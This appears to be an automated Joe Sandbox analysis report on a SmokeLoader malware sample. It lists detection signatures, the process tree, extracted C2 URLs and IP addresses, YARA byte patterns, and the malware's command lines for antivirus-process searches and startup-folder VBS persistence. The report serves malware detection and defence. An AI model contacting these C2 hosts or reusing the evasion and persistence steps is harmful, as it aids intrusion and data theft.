Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hoEtvOOrYH.exe

Overview

General Information

Sample name:hoEtvOOrYH.exe
renamed because original name is a hash value
Original sample name:2a270773553cfdca5c1fdbf24d44f18c.exe
Analysis ID:1582512
MD5:2a270773553cfdca5c1fdbf24d44f18c
SHA1:ba5a6399c539f549b519f084c54852b6d434b030
SHA256:3ffb13f7f47722571dc7271ebbb09c2b893d4efe9a515f19fccc5e75cfa93220
Tags:exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected SmokeLoader
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Drops VBS files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Yara detected Costura Assembly Loader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • hoEtvOOrYH.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\hoEtvOOrYH.exe" MD5: 2A270773553CFDCA5C1FDBF24D44F18C)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • A723.exe (PID: 6048 cmdline: C:\Users\user\AppData\Local\Temp\A723.exe MD5: 3B3D41663F63FF253217889380CDE23F)
        • cmd.exe (PID: 7548 cmdline: "C:\Windows\System32\cmd.exe" /c copy Birth Birth.cmd && Birth.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7656 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7660 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • tasklist.exe (PID: 7700 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 1712 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • 3E6C.exe (PID: 5796 cmdline: C:\Users\user\AppData\Local\Temp\3E6C.exe MD5: 22059CF3BA4B5338116E054D63DBCB46)
      • RegAsm.exe (PID: 6416 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • C3F.exe (PID: 6872 cmdline: C:\Users\user\AppData\Local\Temp\C3F.exe MD5: 53C60D599AA498ED4EFA79BA0B12E29F)
        • cmd.exe (PID: 7052 cmdline: "C:\Windows\System32\cmd.exe" /c move Focused Focused.cmd & Focused.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 2056 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • Result.exe (PID: 5852 cmdline: "C:\Users\user\AppData\Roaming\Result.exe" MD5: 22059CF3BA4B5338116E054D63DBCB46)
      • RegAsm.exe (PID: 3284 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • jagvise (PID: 7684 cmdline: C:\Users\user\AppData\Roaming\jagvise MD5: 2A270773553CFDCA5C1FDBF24D44F18C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://d-s-p.ru/tmp/index.php", "http://volisolsa.com.ua/tmp/index.php", "http://wga2s.cc/tmp/index.php", "http://worldofmorgan.com/tmp/index.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.3947321786.0000000003027000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.1732204208.0000000000880000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000000.00000002.1732453969.0000000002471000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000000.00000002.1732453969.0000000002471000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000005.00000002.1983884104.0000000000A28000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x32f6:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      12.2.3E6C.exe.6c60000.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbs" , ProcessId: 2056, ProcessName: wscript.exe
        Sigma detected: Communication To Uncommon Destination Ports
        Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 87.120.115.216, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 6416, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 50073
        Sigma detected: Execution of Suspicious File Type Extension
        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\jagvise, CommandLine: C:\Users\user\AppData\Roaming\jagvise, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\jagvise, NewProcessName: C:\Users\user\AppData\Roaming\jagvise, OriginalFileName: C:\Users\user\AppData\Roaming\jagvise, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\jagvise, ProcessId: 7684, ProcessName: jagvise
        Sigma detected: Suspicious Copy From or To System Directory
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Birth Birth.cmd && Birth.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Birth Birth.cmd && Birth.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\A723.exe, ParentImage: C:\Users\user\AppData\Local\Temp\A723.exe, ParentProcessId: 6048, ParentProcessName: A723.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Birth Birth.cmd && Birth.cmd, ProcessId: 7548, ProcessName: cmd.exe
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbs" , ProcessId: 2056, ProcessName: wscript.exe

        Data Obfuscation

        barindex
        Sigma detected: Drops script at startup location
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\3E6C.exe, ProcessId: 5796, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbs

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Sigma detected: Search for Antivirus process
        Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Birth Birth.cmd && Birth.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7548, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 1712, ProcessName: findstr.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-30T19:43:07.643862+010020283713Unknown Traffic192.168.2.44976023.145.40.181443TCP
        2024-12-30T19:44:08.353051+010020283713Unknown Traffic192.168.2.44996223.145.40.181443TCP
        2024-12-30T19:45:10.243183+010020283713Unknown Traffic192.168.2.45005051.79.230.147443TCP
        2024-12-30T19:45:37.881439+010020283713Unknown Traffic192.168.2.450064192.185.146.136443TCP
        2024-12-30T19:45:55.393275+010020283713Unknown Traffic192.168.2.45007645.118.248.184443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-30T19:42:23.662544+010020391031A Network Trojan was detected192.168.2.44973658.151.148.9080TCP
        2024-12-30T19:42:25.118879+010020391031A Network Trojan was detected192.168.2.44973758.151.148.9080TCP
        2024-12-30T19:42:26.599116+010020391031A Network Trojan was detected192.168.2.44973858.151.148.9080TCP
        2024-12-30T19:42:28.066270+010020391031A Network Trojan was detected192.168.2.44973958.151.148.9080TCP
        2024-12-30T19:42:29.526498+010020391031A Network Trojan was detected192.168.2.44974058.151.148.9080TCP
        2024-12-30T19:42:31.023710+010020391031A Network Trojan was detected192.168.2.44974158.151.148.9080TCP
        2024-12-30T19:42:32.476347+010020391031A Network Trojan was detected192.168.2.44974258.151.148.9080TCP
        2024-12-30T19:42:33.955334+010020391031A Network Trojan was detected192.168.2.44974358.151.148.9080TCP
        2024-12-30T19:42:35.391274+010020391031A Network Trojan was detected192.168.2.44974458.151.148.9080TCP
        2024-12-30T19:42:36.871674+010020391031A Network Trojan was detected192.168.2.44974558.151.148.9080TCP
        2024-12-30T19:42:38.356537+010020391031A Network Trojan was detected192.168.2.44974658.151.148.9080TCP
        2024-12-30T19:42:40.059112+010020391031A Network Trojan was detected192.168.2.44974758.151.148.9080TCP
        2024-12-30T19:42:41.554692+010020391031A Network Trojan was detected192.168.2.44974858.151.148.9080TCP
        2024-12-30T19:42:43.007851+010020391031A Network Trojan was detected192.168.2.44974958.151.148.9080TCP
        2024-12-30T19:42:44.454560+010020391031A Network Trojan was detected192.168.2.44975058.151.148.9080TCP
        2024-12-30T19:42:45.942343+010020391031A Network Trojan was detected192.168.2.44975158.151.148.9080TCP
        2024-12-30T19:42:47.461369+010020391031A Network Trojan was detected192.168.2.44975258.151.148.9080TCP
        2024-12-30T19:42:48.939673+010020391031A Network Trojan was detected192.168.2.44975358.151.148.9080TCP
        2024-12-30T19:42:50.395023+010020391031A Network Trojan was detected192.168.2.44975458.151.148.9080TCP
        2024-12-30T19:42:52.207696+010020391031A Network Trojan was detected192.168.2.44975558.151.148.9080TCP
        2024-12-30T19:42:53.672878+010020391031A Network Trojan was detected192.168.2.44975758.151.148.9080TCP
        2024-12-30T19:42:55.177365+010020391031A Network Trojan was detected192.168.2.44975858.151.148.9080TCP
        2024-12-30T19:43:09.099716+010020391031A Network Trojan was detected192.168.2.44984158.151.148.9080TCP
        2024-12-30T19:43:10.550269+010020391031A Network Trojan was detected192.168.2.44984958.151.148.9080TCP
        2024-12-30T19:43:12.024918+010020391031A Network Trojan was detected192.168.2.44985958.151.148.9080TCP
        2024-12-30T19:43:13.485834+010020391031A Network Trojan was detected192.168.2.44986958.151.148.9080TCP
        2024-12-30T19:43:15.049252+010020391031A Network Trojan was detected192.168.2.44988058.151.148.9080TCP
        2024-12-30T19:43:16.522075+010020391031A Network Trojan was detected192.168.2.44989158.151.148.9080TCP
        2024-12-30T19:43:18.168833+010020391031A Network Trojan was detected192.168.2.44990158.151.148.9080TCP
        2024-12-30T19:43:19.670064+010020391031A Network Trojan was detected192.168.2.44991258.151.148.9080TCP
        2024-12-30T19:43:21.135846+010020391031A Network Trojan was detected192.168.2.44992358.151.148.9080TCP
        2024-12-30T19:43:22.603639+010020391031A Network Trojan was detected192.168.2.44993158.151.148.9080TCP
        2024-12-30T19:43:24.081589+010020391031A Network Trojan was detected192.168.2.44994158.151.148.9080TCP
        2024-12-30T19:43:25.585791+010020391031A Network Trojan was detected192.168.2.44995158.151.148.9080TCP
        2024-12-30T19:44:55.486527+010020391031A Network Trojan was detected192.168.2.45004058.151.148.9080TCP
        2024-12-30T19:44:57.052287+010020391031A Network Trojan was detected192.168.2.45004158.151.148.9080TCP
        2024-12-30T19:44:58.529236+010020391031A Network Trojan was detected192.168.2.45004258.151.148.9080TCP
        2024-12-30T19:45:00.019203+010020391031A Network Trojan was detected192.168.2.45004358.151.148.9080TCP
        2024-12-30T19:45:01.707328+010020391031A Network Trojan was detected192.168.2.45004458.151.148.9080TCP
        2024-12-30T19:45:03.192960+010020391031A Network Trojan was detected192.168.2.45004558.151.148.9080TCP
        2024-12-30T19:45:04.796958+010020391031A Network Trojan was detected192.168.2.45004658.151.148.9080TCP
        2024-12-30T19:45:06.282513+010020391031A Network Trojan was detected192.168.2.45004758.151.148.9080TCP
        2024-12-30T19:45:07.746326+010020391031A Network Trojan was detected192.168.2.45004858.151.148.9080TCP
        2024-12-30T19:45:09.281261+010020391031A Network Trojan was detected192.168.2.45004958.151.148.9080TCP
        2024-12-30T19:45:18.689928+010020391031A Network Trojan was detected192.168.2.45005158.151.148.9080TCP
        2024-12-30T19:45:20.211488+010020391031A Network Trojan was detected192.168.2.45005258.151.148.9080TCP
        2024-12-30T19:45:21.698461+010020391031A Network Trojan was detected192.168.2.45005358.151.148.9080TCP
        2024-12-30T19:45:23.176825+010020391031A Network Trojan was detected192.168.2.45005458.151.148.9080TCP
        2024-12-30T19:45:24.673637+010020391031A Network Trojan was detected192.168.2.45005558.151.148.9080TCP
        2024-12-30T19:45:26.125995+010020391031A Network Trojan was detected192.168.2.45005658.151.148.9080TCP
        2024-12-30T19:45:27.932092+010020391031A Network Trojan was detected192.168.2.45005758.151.148.9080TCP
        2024-12-30T19:45:29.410428+010020391031A Network Trojan was detected192.168.2.45005858.151.148.9080TCP
        2024-12-30T19:45:30.888815+010020391031A Network Trojan was detected192.168.2.45005958.151.148.9080TCP
        2024-12-30T19:45:32.675599+010020391031A Network Trojan was detected192.168.2.45006058.151.148.9080TCP
        2024-12-30T19:45:34.174731+010020391031A Network Trojan was detected192.168.2.45006158.151.148.9080TCP
        2024-12-30T19:45:35.676528+010020391031A Network Trojan was detected192.168.2.45006258.151.148.9080TCP
        2024-12-30T19:45:37.142096+010020391031A Network Trojan was detected192.168.2.45006358.151.148.9080TCP
        2024-12-30T19:45:40.839738+010020391031A Network Trojan was detected192.168.2.45006558.151.148.9080TCP
        2024-12-30T19:45:42.293796+010020391031A Network Trojan was detected192.168.2.45006658.151.148.9080TCP
        2024-12-30T19:45:43.757379+010020391031A Network Trojan was detected192.168.2.45006858.151.148.9080TCP
        2024-12-30T19:45:45.285811+010020391031A Network Trojan was detected192.168.2.45006958.151.148.9080TCP
        2024-12-30T19:45:47.149474+010020391031A Network Trojan was detected192.168.2.45007058.151.148.9080TCP
        2024-12-30T19:45:51.685577+010020391031A Network Trojan was detected192.168.2.45007258.151.148.9080TCP
        2024-12-30T19:45:53.145325+010020391031A Network Trojan was detected192.168.2.45007458.151.148.9080TCP
        2024-12-30T19:45:54.619208+010020391031A Network Trojan was detected192.168.2.45007558.151.148.9080TCP
        2024-12-30T19:46:03.408545+010020391031A Network Trojan was detected192.168.2.45007958.151.148.9080TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: hoEtvOOrYH.exeAvira: detected
        Antivirus detection for URL or domain
        Source: http://d-s-p.ru/tmp/index.phpAvira URL Cloud: Label: malware
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Roaming\jagviseAvira: detection malicious, Label: HEUR/AGEN.1312567
        Found malware configuration
        Source: 00000005.00000002.1983794099.00000000009B0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://d-s-p.ru/tmp/index.php", "http://volisolsa.com.ua/tmp/index.php", "http://wga2s.cc/tmp/index.php", "http://worldofmorgan.com/tmp/index.php"]}
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeReversingLabs: Detection: 39%
        Source: C:\Users\user\AppData\Local\Temp\A723.exeReversingLabs: Detection: 70%
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeReversingLabs: Detection: 13%
        Source: C:\Users\user\AppData\Roaming\Result.exeReversingLabs: Detection: 39%
        Source: C:\Users\user\AppData\Roaming\jagviseReversingLabs: Detection: 60%
        Multi AV Scanner detection for submitted file
        Source: hoEtvOOrYH.exeReversingLabs: Detection: 60%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Roaming\Result.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\jagviseJoe Sandbox ML: detected
        Machine Learning detection for sample
        Source: hoEtvOOrYH.exeJoe Sandbox ML: detected
        Source: hoEtvOOrYH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
        Source: unknownHTTPS traffic detected: 51.79.230.147:443 -> 192.168.2.4:50050 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 192.185.146.136:443 -> 192.168.2.4:50064 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 192.185.175.158:443 -> 192.168.2.4:50067 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 45.118.248.184:443 -> 192.168.2.4:50076 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 192.185.175.158:443 -> 192.168.2.4:50077 version: TLS 1.2
        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 3E6C.exe, 0000000C.00000002.4121138096.0000000006EC0000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.0000000003F89000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 3E6C.exe, 0000000C.00000002.4121138096.0000000006EC0000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.0000000003F89000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: protobuf-net.pdbSHA256}Lq source: 3E6C.exe, 0000000C.00000002.4118759240.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: protobuf-net.pdb source: 3E6C.exe, 0000000C.00000002.4118759240.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: 7_2_00406301 FindFirstFileW,FindClose,7_2_00406301
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: 7_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406CC7
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeCode function: 14_2_004062D5 FindFirstFileW,FindClose,14_2_004062D5
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeCode function: 14_2_00402E18 FindFirstFileW,14_2_00402E18
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeCode function: 14_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_00406C9B
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\

        Software Vulnerabilities

        barindex
        Suspicious execution chain found
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49841 -> 58.151.148.90:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49869 -> 58.151.148.90:80
